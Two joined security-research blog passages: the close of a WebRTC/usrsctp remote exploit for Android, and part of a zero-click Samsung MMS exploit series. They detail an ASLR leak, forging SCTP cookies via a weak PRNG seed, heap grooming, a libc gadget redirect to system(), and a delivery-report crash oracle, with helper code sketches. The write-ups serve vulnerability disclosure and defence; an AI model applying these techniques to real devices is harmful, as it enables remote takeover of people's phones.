Unfortunately, there are very few calls to malloc in usrsctp with sizes that are controllable by incoming traffic, and none of them allow the entire packet contents to be specified. The best I could find was in the processing of a data stream reset chunk. The code is as follows, with some parts removed for clarity.
if (asoc->str_reset_seq_in == seq) {
    len = ntohs(req->ph.param_length);
    number_entries = ((len - sizeof(struct sctp_stream_reset_out_request)) / sizeof(uint16_t));
    tsn = ntohl(req->send_reset_at_tsn);
    asoc->last_reset_action[1] = asoc->last_reset_action[0];
    if (...) {
        ...
    } else if (SCTP_TSN_GE(asoc->cumulative_tsn, tsn)) {
        /* we can do it now */
        ...
    } else {
        /*
         * we must queue it up and thus wait for the TSN's
         * to arrive that are at or before tsn
         */
        struct sctp_stream_reset_list *liste;
        int siz;

        siz = sizeof(struct sctp_stream_reset_list) + (number_entries * sizeof(uint16_t));
        SCTP_MALLOC(liste, struct sctp_stream_reset_list *, siz, SCTP_M_STRESET);
        if (liste == NULL) {
            /* gak out of memory */
            asoc->last_reset_action[0] = SCTP_STREAM_RESET_RESULT_DENIED;
            sctp_add_stream_reset_result(chk, seq, asoc->last_reset_action[0]);
            return;
        }
        liste->seq = seq;
        liste->tsn = tsn;
        liste->number_entries = number_entries;
        memcpy(&liste->list_of_streams, req->list_of_streams, number_entries * sizeof(uint16_t));
        TAILQ_INSERT_TAIL(&asoc->resetHead, liste, next_resp);
This code allocates the liste structure, which can be used to replace the freed mbuf structure. It has one really lucky feature, which is that the next_resp property, which lines up with the mh_next property of the mbuf structure happens to be of the correct type, also mbuf. This would cause problems if it were another type, as usrsctp iterates through the entire mbuf chain before sending a packet.
A less lucky feature is that the properties that line up with the mh_data property of mbuf structure happen to be the current reset sequence number, and the transmission sequence number (TSN). These both are subject to a number of checks in this method. The reset sequence number needs to be exactly equal to the sequence number set when the connection was initialized, either in an INIT or COOKIE_ECHO chunk, and also needs to be equal to the lower four bytes of the SctpTransport pointer. This check can be passed by sending a COOKIE_ECHO chunk that sets the reset sequence number to the needed value before triggering the bug.
More challenging is the check that is performed on the TSN. It is compared to the cumulative TSN, which is originally set to the same value as the reset sequence number. The actual comparison performed is a ‘sequence number greater than’, which determines whether one value is ahead of or behind another value, assuming sequence numbers that roll over to zero when all bits are set. For example, if the current sequence number is 0xFFFFFFFF, the value 2 would pass a  ‘sequence number greater than’ check, but the values 0xFFFFFFFE and 0x80000001 would fail. The TSN read out of the incoming packet has to be the top four bytes of the SctpTransport pointer, meanwhile the cumulative TSN has to be the bottom four bytes of this pointer because it is the same value as the reset sequence number. So this is actually a comparison between the two halves of the pointer. The TSN is a small number, less than 0x80 because it is the top of a pointer, so this comparison will return true roughly whenever bit 31 of the pointer is not set, and return the desired outcome of false roughly whenever it is set.
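The wrap-around comparison described above can be illustrated with a minimal sketch. It follows standard 32-bit serial number arithmetic and assumes that usrsctp's SCTP_TSN_GT and SCTP_TSN_GE macros behave the same way; the function names and the example pointer values are made up for illustration.

```python
MASK32 = 0xFFFFFFFF
HALF = 1 << 31  # half of the 32-bit sequence space


def tsn_gt(a, b):
    """True if sequence number a is 'ahead of' b, allowing for wrap-around."""
    a &= MASK32
    b &= MASK32
    return (a < b and b - a > HALF) or (a > b and a - b < HALF)


def tsn_ge(a, b):
    """'Greater than or equal' variant of the same comparison."""
    return (a & MASK32) == (b & MASK32) or tsn_gt(a, b)


def reset_done_immediately(pointer):
    """Model of the check on a 64-bit pointer split into two halves.

    The low half plays the role of the cumulative TSN and the high half
    the TSN read from the packet. True means the 'we can do it now'
    branch is taken, so the allocation the exploit wants does not happen.
    """
    cumulative_tsn = pointer & MASK32
    tsn = pointer >> 32
    return tsn_ge(cumulative_tsn, tsn)
```

With the current sequence number at 0xFFFFFFFF, tsn_gt(2, 0xFFFFFFFF) is true while tsn_gt(0xFFFFFFFE, 0xFFFFFFFF) and tsn_gt(0x80000001, 0xFFFFFFFF) are false, matching the example in the text. For a hypothetical pointer such as 0x7a12345678 (bit 31 clear) the check takes the immediate branch, and for 0x7a92345678 (bit 31 set) it falls through to the queueing branch.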
Bit 31 of the pointer is determined randomly by ASLR as well as where the SctpTransport instance is allocated on the heap, which means it is set about 50% of the time. Normally, I would be okay with an exploit being 50% effective, because that means it would probably succeed with a few tries, but in this case, that’s not true because it will have the tendency to fail again and again on the same ASLR layout. ASLR layout is determined when an Android device is started up, and doesn’t change again until it is rebooted. So I needed a way to change the cumulative TSN after the reset sequence number has been set.
It turns out that this is possible using the FWD_TSN chunk type, which allows a peer to request that another peer move its cumulative TSN up to 4096 bytes forward. It’s possible to move the cumulative TSN forward enough that bit 31 flips by sending this chunk type repeatedly.  This takes quite a few chunks, but combining chunks into fewer packets and sending them as fast as possible, it can be flipped in a few seconds.
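To get a feel for how many FWD_TSN chunks this takes, here is a back-of-the-envelope sketch. It assumes each chunk can advance the cumulative TSN by at most 4096, as stated above, and that the goal is simply to reach a value with bit 31 set; the function name is hypothetical.

```python
BIT31 = 0x80000000
MAX_FWD_STEP = 4096  # per-chunk advance limit, taken from the text above


def fwd_tsn_chunks_needed(cumulative_tsn, max_step=MAX_FWD_STEP):
    """Number of FWD_TSN chunks needed before bit 31 of the cumulative TSN is set."""
    cumulative_tsn &= 0xFFFFFFFF
    if cumulative_tsn & BIT31:
        return 0  # bit 31 is already set, nothing to do
    distance = BIT31 - cumulative_tsn
    return -(-distance // max_step)  # ceiling division
```

In the worst case, with the cumulative TSN starting at 0, this comes to 2^31 / 4096 = 524288 chunks, which is why batching many chunks into each packet matters.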
Putting this all together, the bug can be used to make the target device send back the memory of the SctpTransport instance, which contains a pointer to the class’s vtable, finally giving the location of the WebRTC library and breaking ASLR.
Thinking about it a bit, I didn’t think the WebRTC library would be the best library to use for my exploit, as it’s not unusual for WebRTC integrators to statically link it with other libraries and use all sorts of toolchains. It would be easier to know the location of libc, which comes from the Android system and has less variation. So I added a second usage of this bug that reads the location of malloc from the global offset table, which is a fixed offset from the SctpTransport vtable that has already been read. This allows the location of libc to be calculated.
Moving the Instruction Pointer (Again)
In Part 1, I figured out how to use an RTP memory corruption bug to move the instruction pointer, but after I filed CVE-2020-6514, Jann Horn suggested that it might be possible to use this bug to move the instruction pointer as well. When WebRTC uses the SctpTransport pointer as an address, it doesn’t just use it to identify the connection, but it actually casts the pointer to class SctpTransport, and makes virtual calls on it when sending outbound packets received from usrsctp.
Meanwhile, usrsctp usually determines the address for outbound packets based on identifiers in the packet, but there is one situation where it extracts the address from the packet itself: when processing COOKIE_ECHO chunks. Normally, it wouldn’t be possible to put an untrusted pointer in this chunk type, as its contents are usually echoed from an incoming packet and need to be signed. However, Jann noticed that the random number generation for the signing key is very weak. The following code gets called when usrsctp is initialized.
The random number generator is then seeded by calling rand.
The INIT chunk sent when starting an SCTP connection contains a randomly generated key used for authentication, generated by the same random number generator used for the secret key. I wrote a script that determines the value of the remote PID based on this key, by calling srand on every number between 0 and 70 000, and seeing which one causes the random number generator to produce the same authentication key. It is then possible to infer the value of the secret key.
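The search over candidate PIDs can be sketched as follows. This is only an illustration of the brute-force idea: Python's own generator stands in for the C library generator that usrsctp actually uses, so the byte values will not match a real target, and derive_key and recover_pid are hypothetical names.

```python
import random

MAX_PID = 70000  # upper bound on candidate PIDs, as in the text above


def derive_key(seed, nbytes=32):
    """Stand-in for 'seed the PRNG, then generate the authentication key'.

    Assumption: Python's Mersenne Twister replaces the C PRNG here.
    """
    rng = random.Random(seed)
    return rng.getrandbits(nbytes * 8).to_bytes(nbytes, "big")


def recover_pid(observed_key, max_pid=MAX_PID):
    """Try every candidate seed and return the one that reproduces the key."""
    for pid in range(max_pid + 1):
        if derive_key(pid, len(observed_key)) == observed_key:
            return pid
    return None  # the key did not come from a seed in the searched range
```

Once the seed is known, the same generator state can be replayed to predict any other value drawn from it, which is the step that yields the secret key.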
This key now allows the attacking device to send COOKIE_ECHO chunks with any contents, including changing the address to a custom pointer. This allows the instruction pointer to be moved, as a virtual call will be made on whatever address is provided the next time an outbound packet is sent, which happens immediately when the peer responds with a COOKIE_ACK. In the above section, I also discussed using COOKIE_ECHO packets to change the reset sequence number, while glossing over how I was actually sending them. It was using this same method.
I now had two possible methods for setting the instruction pointer in the exploit. I chose to move forward with this one, as it uses usrsctp, which is also necessary to break ASLR, meanwhile the RTP one uses a different feature. I felt that reducing the number of features needing to be enabled for this exploit to work would increase the number of applications it worked on, as sometimes applications disable specific WebRTC features.
Putting it All Together
Having all the necessary capabilities for an exploit, I then needed to put them all together. My general strategy was to make a fake object on the heap at a known location, and then make a virtual call on that object. The fake object would have a fake vtable in the same buffer that would point to system, which would run a shell command.
One missing piece is how to populate heap memory at a known location. One possibility was to use RTP to allocate memory of the same size as the SctpTransport object, hoping it gets allocated at the address directly after the object, or at a predictable location. I tried this, and it worked maybe 50% of the time, but considering I had a way to read memory, I thought I could do better.
I noticed that the SctpTransport class contains a CopyOnWriteBuffer object named partial_incoming_message_ that is sometimes used to store incoming SCTP data. SCTP supports data fragmentation, and usrsctp passes incomplete fragmented packets to WebRTC if they get above a certain size. These are stored in the partial_incoming_message_ object until the rest of the packet is received. So I thought if I sent the data for the fake object over SCTP to the target device, it would eventually populate this buffer, and I could read the address. (Note that this actually requires two reads, as there are two levels of indirection between a CopyOnWriteBuffer object and its backing data.)
I tried this, and it worked, but there was another problem. In order to create a fake object with a fake vtable, the fake object needed to reference itself, but this method only allowed me to know the location of the memory after it had been written to and couldn’t be changed. I looked a bit closer at how this functionality works. The code for setting the buffer is as follows.
transport->partial_incoming_message_.AppendData(
    reinterpret_cast<uint8_t*>(data), length);
...
if (!(flags & MSG_EOR) &&
    (transport->partial_incoming_message_.size() < kSctpSendBufferSize)) {
  return 1;
}
...
transport->invoker_.AsyncInvoke<void>(
    RTC_FROM_HERE, transport->network_thread_,
    rtc::Bind(&SctpTransport::OnInboundPacketFromSctpToTransport,
              transport, transport->partial_incoming_message_, params, flags));
transport->partial_incoming_message_.Clear();
What’s happening here is that incoming data is always immediately appended to the partial_incoming_message_ buffer, and then if it is an incomplete fragment, the function returns. Otherwise, it queues a thread to process the data, and then clears the buffer.
I started to wonder how clearing works, considering the data is still needed by the queued thread that might not be finished yet. It turns out that the CopyOnWriteBuffer class retains references to the data, and only deletes it if there are zero references left. Otherwise, it decrements the reference count and allocates new data of the current size for the buffer. This means it is possible to read the location of the partial_incoming_message_ buffer before data is written to it, because it is actually allocated during the clear. So long as the data written by AppendData is shorter than or the same size as the largest size ever cleared, this memory will not be reallocated.
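The clearing behavior described above can be modelled with a toy reference-counted buffer. This is a simplified model built only from the description in this post, not WebRTC's actual CopyOnWriteBuffer; the class and method names are hypothetical, and a Python object's identity stands in for a heap address.

```python
class Backing:
    """Stand-in for the reference-counted heap allocation behind the buffer."""

    def __init__(self, capacity):
        self.capacity = capacity
        self.data = bytearray()
        self.refs = 1


class CowBuffer:
    def __init__(self):
        self.backing = None

    def share(self):
        """Hand a reference to another holder, such as a queued task."""
        self.backing.refs += 1
        return self.backing

    def append(self, chunk):
        b = self.backing
        needed = len(chunk) + (len(b.data) if b else 0)
        if b is None or b.refs > 1 or needed > b.capacity:
            # A new allocation is needed: first use, shared data, or no room left.
            fresh = Backing(max(needed, b.capacity if b else 0))
            if b is not None:
                fresh.data += b.data
                b.refs -= 1
            self.backing = b = fresh
        b.data += chunk

    def clear(self):
        b = self.backing
        if b is None:
            return
        if b.refs == 1:
            b.data.clear()  # sole owner: reuse the allocation in place
        else:
            b.refs -= 1  # someone else still needs the old data
            self.backing = Backing(b.capacity)  # fresh allocation, same capacity


def demo():
    buf = CowBuffer()
    buf.append(b"A" * 64)       # first message fills the buffer
    queued = buf.share()        # queued task keeps the old data alive
    buf.clear()                 # a new backing allocation is made here
    known = buf.backing         # this is the "address" that could be leaked
    buf.append(b"B" * 64)       # fits in the capacity, so no reallocation
    return buf.backing is known, bytes(queued.data)
```

In this model, demo() shows the two properties the exploit relies on: the allocation made during the clear is the one that later receives the appended data, and the queued holder still sees the original contents.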
This allowed me to create a heap buffer at a known location and populate it. The last step was to figure out what to populate it with. I started out by filling it up with sequential numbers, and then using the address it crashed on to figure out what memory to change. After using the crash locations to create the fake vtable, I ended up with a crash on a branch to X8, and the only other controllable register was X21. X0 was of course set to the location of the fake vtable, as this crash was due to a virtual call, as were X1 and X23.
Astoundingly, libc had the perfect gadget for this situation.
do_nftw(char const*,int (*) …) + 0x138
LDR             X0, [X23,#0x30]
LDR             X1, [X23,#0x70]
BLR             X21
Setting the value loaded in X21 to system, and copying a string parameter at an offset of 0x30 past the fake vtable (which X23 points to), caused system to be called with the parameter!
To give a quick overview, here are the steps required for the exploit, in order:
  1. The PID is determined based on the key in the INIT chunk, and then the secret key is determined
  2. The vtable is read from the SctpTransport object
  3. The location of malloc is read from the global offset table
  4. The partial_incoming_message_ buffer is populated with data of the needed size
  5. The partial_incoming_message_ buffer is cleared, so a new buffer is allocated
  6. The address of the partial_incoming_message_ buffer is read from the SctpTransport object
  7. The address of the partial_incoming_message_ backing buffer is read from the buffer structure
  8. The partial_incoming_message_ buffer is populated with exploit data, based on the location of malloc
  9. The bug is triggered, making a virtual call to a gadget and then system
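The address arithmetic behind steps 3 and 8 can be sketched as below. The three offsets are inputs that depend on the target's libc and on the binary containing WebRTC; the function names and any concrete numbers used with them are placeholders, not values from a real device.

```python
MASK64 = (1 << 64) - 1


def got_slot_for_malloc(vtable_addr, got_malloc_minus_vtable):
    """Address of malloc's global offset table entry, given the leaked vtable address."""
    return (vtable_addr + got_malloc_minus_vtable) & MASK64


def libc_targets(malloc_addr, system_minus_malloc, gadget_minus_malloc):
    """Addresses of system and the gadget, given the leaked address of malloc.

    Offsets may be negative; they are fixed for a given libc build.
    """
    return {
        "system": (malloc_addr + system_minus_malloc) & MASK64,
        "gadget": (malloc_addr + gadget_minus_malloc) & MASK64,
    }
```

The first function gives the address to read in step 3, and the second gives the values that are written into the fake object in step 8.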

Now I had an exploit that worked in … the WebRTC sample Android application. Stay tuned for Part 3, where I explore what real Android applications the exploit works on.

MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle

4 August, 2020 - 18:21
Posted by Mateusz Jurczyk, Project Zero
This post is the fourth of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.
Introduction
In Part 3 of the series, I chose one of the 174 obvious Qmage memory corruption crashes reported in Issue #2002 for exploitation. It was a linear heap buffer overflow in RLE decompression with an arbitrary allocation size, overflow size, and overflow data. By carefully adjusting the bitmap dimensions (which control the heap region size), we managed to place the pixel storage buffer directly before the associated android::Bitmap object in memory, allowing us to reliably corrupt it. From there, we constructed some potential RCE primitives, as well as a memory oracle that triggers a control flow-neutral read from a chosen memory area, triggering a crash or not depending on whether the address range is mapped and readable. In terms of low-level capabilities, this is a satisfying set of options to continue working with.
To make further progress in the exploit development, we finally have to get familiar with the MMS protocol that we'll be using as the medium of our attack. Specifically, we need to find a way to remotely leak information about the crash of the target Messages app, or lack thereof, to complete the ASLR oracle and build a more complex ASLR bypass logic on top of it. This is not completely trivial considering the unidirectional nature of MMS, but ultimately possible thanks to the little used feature of delivery reports. However, first things first – let's start with learning more about the protocol itself, and how we can move from sending test messages from a smartphone, to programmatically running experiments from a more comfortable environment of one's workstation.
Setting up a test environment
In order to be able to test MMS effectively, we need an easy way to deliver them to the target device from our PC. There are various methods to achieve this, for example Joshua Drake suggested two ways to send MMS without carriers in his Stagefright Black Hat presentation in 2015 (slides 84-85). However, I decided to take a more practical approach and send all messages through carriers, to be able to observe fully accurate results and spot any real-life issues related to conducting such an attack in practice.
To that end, I purchased two SIM cards for sending and receiving messages, and enabled an "unlimited MMS" package on the sender one to avoid excessive costs. Then, I found and licensed the NowSMS Windows software, which is a powerful solution for sending, receiving, and processing SMS/MMS. It may serve as an SMS server, MMS server, WAP Push Proxy Gateway and Multimedia Messaging Center (MMSC), and has a number of advanced features that are beyond the scope of our use case. Most importantly, it can be used to send messages through a locally connected GSM modem, or an Android phone acting as one. This is precisely the functionality we need, and it's available even in the most basic Now SMS & MMS Lite package. Notably, the service can be used in a number of ways: via a local web interface, through an HTTP API, and through developer API made available for technologies such as PHP, Java and .NET (C#, Visual Basic). The vendor also maintains an extensive documentation regarding both the product and relevant mobile protocols, and hosts an active user forum. All in all, NowSMS proved extremely helpful in my research by making interactions with SMS/MMS easily accessible on a PC, both manually and programmatically.
The screenshot below shows what the MMS sending page looks like in the Web UI (in Developer Mode). We can immediately spot a number of new and unfamiliar settings which are not available to the user when sending a message on a typical mobile phone. It looks like we have gained much more fine-grained control over what is transmitted over the cellular network:

The Android phone acting as a modem may operate in three modes: "Local WiFi", "Remote Direct" and "Remote via Cloud". In my case, I used the Remote Direct mode, and connected the sender phone to the local network via an ethernet cable, to prevent any disruptions related to wireless connectivity. At the same time, I connected the victim phone to my workstation via a USB cable for command line access and screen capturing. The structure of my setup is illustrated below:

I used a Samsung Galaxy A50 as the modem, and Samsung Galaxy Note 10+ as the receiver. In addition to having them connected to the PC for data transfer, it was obviously necessary to keep them charged throughout the testing, and to ensure that they were placed in a spot with strong cellular signal.
Crafting a raw MMS PDU
Now that we have a solid testing environment setup on a PC, we can dig deeper into MMS itself to better understand how it works. MMS is a relatively old technology dating back to circa 2001-2002, and since its inner workings are relevant mostly to mobile network operators, it is not documented as well as many other technologies and protocols seen in widespread use today. However, throughout this project, I have dug up a number of comprehensive books, articles, presentation slides and other educational materials on the subject. They are listed below for your convenience:

The volume of these resources may seem overwhelming, but in fact, we are only interested in a small subset of the MMS architecture, namely the MM1 protocol used between mobile devices and the MMSC (Multimedia Messaging Service Centre). The Phone to MMSC Protocol (MM1) slides from NowSMS are a highly recommended read to get a good overview of its design. In essence, we can view an MMS message as a self-contained binary file of MIME type application/vnd.wap.mms-message. It contains a number of headers (some of them required, some optional), followed by optional Multipart objects – the actual multimedia content of the message (images, audio, video, etc.). The details of the MMS binary encoding are defined by the MMS Encapsulation Protocol, and the list of headers compatible with the M-Send.req request can be found in that document in section "6.1.1 Send Request" on page 17.
An example source file of an MMS message is shown below:
 1:   X-Mms-Message-Type: m-send-req
 2:   X-Mms-Version: 1.3
 3:   To: 0123456789
 4:   Subject: MMS subject
 5:   X-Mms-Message-Class: Personal
 6:   X-Mms-Priority: Normal
 7:   X-NowMMS-Content-Location: message.txt;text/plain
 8:   X-NowMMS-Content-Location: image.jpg;image/jpeg
Lines 1-3 specify mandatory headers, lines 4-6 specify optional headers, and lines 7-8 contain NowSMS-specific headers that point to the multimedia files to include in the message, and indicate their respective MIME types. Such an MMS source file can be converted to its binary form with the NowSMS mmscomp command line utility:

The first 128 bytes of the message.MMS file are shown below; the rest are just the remainder of the JPEG image contents:
00000000: 8c 80 8d 90 97 30 31 32 33 34 35 36 37 38 39 00  .....0123456789.
00000010: 96 4d 4d 53 20 73 75 62 6a 65 63 74 00 8a 80 8f  .MMS subject....
00000020: 81 84 a3 02 1e 0d 83 c0 22 3c 6d 65 73 73 61 67  ........"<messag
00000030: 65 2e 74 78 74 3e 00 8e 6d 65 73 73 61 67 65 2e  e.txt>..message.
00000040: 74 78 74 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64  txt.Hello, world
00000050: 21 1a 84 df 48 9e c0 22 3c 69 6d 61 67 65 2e 6a  !...H.."<image.j
00000060: 70 67 3e 00 8e 69 6d 61 67 65 2e 6a 70 67 00 ff  pg>..image.jpg..
00000070: d8 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00  .....Adobe.d....
In this blob, we can see the binary-encoded headers (for example the two initial 0x8c 0x80 bytes encode "X-Mms-Message-Type: m-send-req"), as well as a number of plaintext strings corresponding to the header values, attachment file names, and data of the embedded files themselves. Such a raw MMS file can be sent via NowSMS, and will be delivered in a very similar form to the recipient device.
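To make the binary header encoding more concrete, here is a minimal decoder sketch for the first few headers of the dump. The field-code table reflects my reading of the assignments in the MMS Encapsulation Protocol and covers only the headers that appear at the start of this message; the function name is hypothetical, and only the simplest value encodings (a single byte, or a NUL-terminated text string) are handled.

```python
# Field codes with the high bit stripped (0x8c & 0x7f == 0x0c, and so on).
FIELD_NAMES = {
    0x0C: "X-Mms-Message-Type",
    0x0D: "X-Mms-Version",
    0x17: "To",
    0x16: "Subject",
    0x0A: "X-Mms-Message-Class",
    0x0F: "X-Mms-Priority",
}
TEXT_FIELDS = {0x16, 0x17}  # values stored as NUL-terminated strings


def decode_simple_headers(blob):
    """Decode leading headers until an unknown field code is reached."""
    headers = []
    i = 0
    while i < len(blob):
        code = blob[i] & 0x7F
        if not (blob[i] & 0x80) or code not in FIELD_NAMES:
            break  # stop at the first header this sketch does not understand
        i += 1
        if code in TEXT_FIELDS:
            end = blob.index(0, i)  # find the terminating NUL byte
            value = blob[i:end].decode("ascii")
            i = end + 1
        else:
            value = blob[i]  # single-byte encoded value, left undecoded
            i += 1
        headers.append((FIELD_NAMES[code], value))
    return headers


# The first 0x22 bytes of the dump above, plus the start of the next header.
SAMPLE = (bytes.fromhex("8c808d9097") + b"0123456789\x00"
          + b"\x96MMS subject\x00" + bytes.fromhex("8a808f8184a3"))
```

Calling decode_simple_headers(SAMPLE) walks the message type, version, To, Subject, message class and priority headers in that order, then stops at the 0x84 byte, which this sketch does not attempt to parse.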
As a side note, correctly formatted MMS messages are also expected to contain SMIL (Synchronized Multimedia Integration Language) resources, which define how the multimedia and text should be presented to the user. If you are interested in more details on how they're used in MMS, there is a good tutorial by NowSMS on the subject. However, the SMIL markup seems to be optional in practice, and client apps such as Samsung Messages will correctly display MMS without it. When it comes to file attachments in general, what matters the most for us is that their MIME types are specified explicitly and separately in the encoded message, which enables us to freely send Qmage files marked as image/jpeg (or some other image type) and have them automatically loaded as bitmaps.
MMS delivery reports
Delivery reports have been part of the MMS specification since version 1.0. They enable the sender of a message to request a confirmation of its successful delivery to the recipient. It's one of the very few ways for the sender to receive any kind of (indirect) feedback from the target phone, and it is what we intend to use to complete our ASLR oracle mechanism.
When composing the MMS PDU, a delivery report can be requested by setting the X-Mms-Delivery-Report header to "yes", which is expressed as 0x86 0x81 in binary. Here's how the header is described in Gwenaël Le Bodic's book:
Request for a delivery report. This parameter indicates whether or not delivery report(s) are to be generated for the submitted message. Two values can be assigned to this parameter: 'yes' (delivery report is to be generated) or 'no' (no delivery report requested). If the message class is 'auto', then this parameter is present in the submission PDU and is set to 'no'.
Quite frankly, I have never legitimately used this feature of MMS before. Even though it's part of the protocol, the option to request delivery reports is missing in some common apps such as Google Messages (it only supports SMS delivery reports). However, Samsung Messages does support it, so we can enable the reports under Settings > More settings > Multimedia messages > Show when delivered, and test it out:

The option does indeed work as advertised. Let's take a deeper look at how it is implemented in the protocol and in the client app, and how we can make use of it in our exploit.
A closer look at MM1
Once again, let me start by emphasizing that Gwenaël's slides 24-41 and the entire NowSMS MM1 slide deck explain the MM1 protocol and data flows in great detail. In our case, let's analyze the transactions involved in sending and receiving an MMS in an environment with a few assumptions:
  • The originator and recipient are both in the same network, so there is no inter-operator communication taking place. Whether this is true or not shouldn't make any practical difference for us, as the data exchange between them happens seamlessly over the MM4 protocol and doesn't have any observable side effects (that I know of).
  • The recipient has the auto-retrieval of MMS enabled, which I understand to be the default on most or all Samsung devices.
  • The recipient has good enough connectivity to be able to download the message.
  • The delivery report is requested by the originator.

Under these conditions, the message exchange between two mobile phones and the MMSC is illustrated in the following diagram:

In a typical scenario, the sender initiates an M-send.req HTTP POST transaction to the carrier. Once the MMS is transmitted in full, the MMSC sends a WAP PUSH notification to the recipient to announce that a message is awaiting. In the case of auto-retrieve, the client app immediately sends an HTTP GET request, and receives the serialized MMS data in response. Finally, it acknowledges the receipt of the message with an M-notifyresp.ind POST request, and that information is forwarded back to the sender in the form of an M-delivery.ind transaction. This concludes the communication between the participating parties.
The biggest problem shown in the diagram is the fact that the Samsung Messages app parses the incoming MMS before finalizing communication with the MMSC through the M-notifyresp.ind PDU. Ideally, any processing of external data should only take place once the connection with MMSC is closed. Otherwise, if the app crashes during the processing of a corrupted media file, the final M-notifyresp.ind message is never transmitted, which causes the MMSC to classify the MMS delivery as unsuccessful and prevents it from sending the delivery receipt to the originator. This creates a very easily observable side channel, revealing whether Samsung Messages crashed on the victim phone or not.

Coupled with the powerful memory-probing primitive constructed in Part 3, the side channel enables an attacker to remotely query the readability of arbitrary address ranges, with no user interaction required. Such a capability is enormously useful on Android due to the Zygote design, and the fact that the location of code and data in the address space is persistent across program crashes. Consequently, even though the ASLR oracle output only carries 1 bit of information at a time, the overall attack can be broken down into multiple steps, and their results combined to determine complete 64-bit addresses of the necessary gadgets.
We can confirm the behavior by checking the logcat logs on the target device. When we send a regular MMS message, we can see both the WSP/HTTP GET.req and M-notifyresp.ind (POST) requests being made:
d2s:/ $ logcat -v time | grep "HTTP: "
07-23 11:25:25.494 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=0
07-23 11:25:25.548 I/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:25:25.548 I/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: UaProfUrl=
07-23 11:25:26.449 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: 200 OK
07-23 11:25:27.388 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: response size=66626
07-23 11:25:28.825 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: POST http://<redacted>, proxy=<redacted>, PDU size=16
07-23 11:25:28.831 I/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:25:28.831 I/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: UaProfUrl=
07-23 11:25:29.155 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: 200 OK
07-23 11:25:29.155 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: response size=0
The time span between receiving the full message from the MMSC and sending the acknowledgement is around 1.5 seconds. On the other hand, when we send a malformed Qmage file, only the WSP/HTTP GET.req request is visible in the logs:
d2s:/ $ logcat -v time | grep "HTTP: "
07-23 11:32:10.890 D/CS/MmsHttpClient(30665): [a@1c69780] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=0
07-23 11:32:10.899 I/CS/MmsHttpClient(30665): [a@1c69780] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:32:10.899 I/CS/MmsHttpClient(30665): [a@1c69780] HTTP: UaProfUrl=
 11:32:11.272 D/CS/MmsHttpClient(30665): [a@1c69780] HTTP: 200 OK
07-23 11:32:11.273 D/CS/MmsHttpClient(30665): [a@1c69780] HTTP: response size=935
Before M-notifyresp.ind can be sent, the process crashes after ~1.3 seconds of reading the HTTP response:
130|d2s:/ $ logcat -b crash -v time
07-23 11:32:12.585 F/libc    (30665): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 31866 (pool-8-thread-1), pid 30665 (droid.messaging)
This confirms the insecure behavior on the client app side. How does it look from the perspective of an attacker? When the M-delivery.ind PDU is received by NowSMS, it is decoded and saved in a text file with a .HDR extension in the "C:\Program Files (x86)\NowSMS\MMS-IN" directory, for example C0B04508.HDR:
X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMN
X-NowMMS-Modem-Name: NowSMSModem - a50
Message-type: m-delivery-ind
MMS-version: 1.2
Message-id: 20200723-11-E46838C6@nowsms
To: <redacted>/TYPE=PLMN
Date: Thu, 23 Jul 2020 09:55:00 GMT
Status: Retrieved
The status is indicated as "retrieved", and the report can be associated with the original message through the value of the Message-id header. Otherwise, if the original MMS crashes the target phone, we don't see any immediate return messages in the MMS-IN directory. Depending on the MMS expiry period (specified in the headers or defined by the operator's default setting), the carrier may retry to deliver the message, and if that fails, it eventually expires and the sender is notified about it too:
X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMN
X-NowMMS-Modem-Name: NowSMSModem - a50
Message-type: m-delivery-ind
MMS-version: 1.2
Message-id: 20200723-11-D44AF894@nowsms
To: <redacted>/TYPE=PLMN
Date: Thu, 23 Jul 2020 11:03:39 GMT
Status: Expired
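The two reports above differ only in their Message-id, Date and Status headers, so turning a report into an oracle bit is mostly a parsing exercise. Below is a minimal Python sketch of that step. It assumes the decoded .HDR file holds one "Name: value" header per line; the function names and the three-way return value are hypothetical and are not taken from the actual exploit.

```python
from typing import Dict, Optional


def parse_hdr(text: str) -> Dict[str, str]:
    """Parse 'Name: value' lines of a decoded delivery report into a dict."""
    headers = {}
    for line in text.splitlines():
        name, sep, value = line.partition(":")
        if sep:  # ignore lines that carry no header
            headers[name.strip().lower()] = value.strip()
    return headers


def oracle_bit(report: Optional[str], message_id: str) -> Optional[bool]:
    """Map a delivery report to an oracle result.

    True  -> message retrieved, so the Messages app survived
    False -> message expired, or no report at all (assumed crash)
    None  -> the report belongs to a different message
    """
    if report is None:
        return False
    headers = parse_hdr(report)
    if headers.get("message-id") != message_id:
        return None
    return headers.get("status", "").lower() == "retrieved"


# Sample input modelled on the first report shown above.
SAMPLE = """Message-type: m-delivery-ind
MMS-version: 1.2
Message-id: 20200723-11-E46838C6@nowsms
Date: Thu, 23 Jul 2020 09:55:00 GMT
Status: Retrieved"""

print(oracle_bit(SAMPLE, "20200723-11-E46838C6@nowsms"))
```

Matching on Message-id first matters because reports for earlier probes can arrive late, for instance when a message finally expires.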
